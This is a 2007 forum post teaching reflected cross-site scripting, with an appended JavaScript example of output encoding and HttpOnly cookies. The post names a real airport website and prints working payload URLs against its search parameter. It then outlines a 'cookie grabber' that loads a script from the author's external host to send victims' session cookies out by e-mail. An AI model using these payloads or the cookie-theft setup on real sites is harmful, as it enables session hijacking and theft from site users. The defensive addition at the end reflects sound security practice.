[EN] XSS Guide - 1st Part

XSS Guide - 1st Part

-------------------------------
Author: Langy
Date: 6-09-2007
Copyright: http://www.googlebig.com

-------------------------------

Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)

http://en.wikipedia.org/wiki/Cross-site_scripting

-------------------------------

Finding a website vulnerable to XSS is not very difficult.
In most cases you can write this in the site's search box:

PHP Code:
"><script>alert('try_xss');</script> 


This script does nothing more than show an alert on the screen; if you see the alert, it means that the script has been included in the page returned by the site.

Now we try to write:

PHP Code:
"><script>alert('document.cookie');</script> or
"><script>alert(document.cookie);</script>


If this XSS works, we will see on the screen an alert containing our session cookies for the site.

Or, if it did not run, just check the URL and see how it is generated:

- Example:

The last XSS that I have discovered is on the "aeroporto di Puglia" website:

http://www.seap-puglia.it/

If we try to search for "><script>alert('try_xss');</script> nothing happens.
But now look at the URL:

PHP Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1=%22%3E%3Cscript%3Ealert('try_xss');%3C/script%3E&strRicerca2=&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=


We find the variable that carries the search term, in this case "strRicerca1".

Then put the alert code directly after this variable:

PHP Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script>alert('try_xss');</script>


The alert will magically appear.

Now we try to write:

PHP Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script>alert(document.cookie);</script>


Perfect! We see our cookie!

At this point we need to know the victim's cookie, and this is where a "cookie grabber" comes in. A cookie grabber is a script that stays on our server and is included in the website URL so that the cookies are sent to us directly by the victim :D


If we want to include a file containing JavaScript, we can write:

PHP Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script> 


Inside the file "cookiescript.js" we write code that displays the cookie and sends it by e-mail.

This will be shown in the second part of the guide.

This guide can be used freely on any site, provided it is left unchanged, including the copyright.

Go to 2nd part of guide


"There is no patch for human stupidity" - K. D. M.

This post was last modified: 11-02-2008 04:21 PM by Langy.

31-01-2008 07:12 PM
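
The search-parameter case described in the post, seen from the side of the page that renders it, as an added example that is not part of the original post or of the site's code. It assumes the term is written back into a quoted `value` attribute; the function names and the cookie name and value are hypothetical or constructed.

```javascript
// Added example; function names below are hypothetical, not the site's code.

// Vulnerable pattern: the search term is concatenated into a quoted attribute
// as-is, so a term beginning with `">` closes the attribute and the tag.
function renderSearchBoxUnsafe(term) {
  return '<input type="text" name="strRicerca1" value="' + term + '">';
}

// HTML-encode the characters that can change context in element content or
// in a quoted attribute value. `&` is replaced first to avoid double encoding.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: same markup, but the term is encoded on output.
function renderSearchBoxSafe(term) {
  return '<input type="text" name="strRicerca1" value="' + escapeHtml(term) + '">';
}

// Defense in depth: an HttpOnly session cookie is not exposed through
// document.cookie, so a script that does get injected cannot read it.
function sessionCookieHeader(name, value) {
  return name + '=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Crude check used for the demonstration: is there a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Query string from the post; the server sees the percent-decoded value.
const query = "rif=1&tiporicerca=2&strRicerca1=%22%3E%3Cscript%3Ealert('try_xss');%3C/script%3E&strRicerca2=";
const term = new URLSearchParams(query).get('strRicerca1');

console.log('decoded term :', term);
console.log('unsafe markup:', renderSearchBoxUnsafe(term));
console.log('safe markup  :', renderSearchBoxSafe(term));
console.log('Set-Cookie   :', sessionCookieHeader('sid', 'constructed-sample-value'));
```

With output encoding the term is shown back to the user as text inside the search box, and the HttpOnly flag limits what an injected script could read if encoding were missed somewhere else.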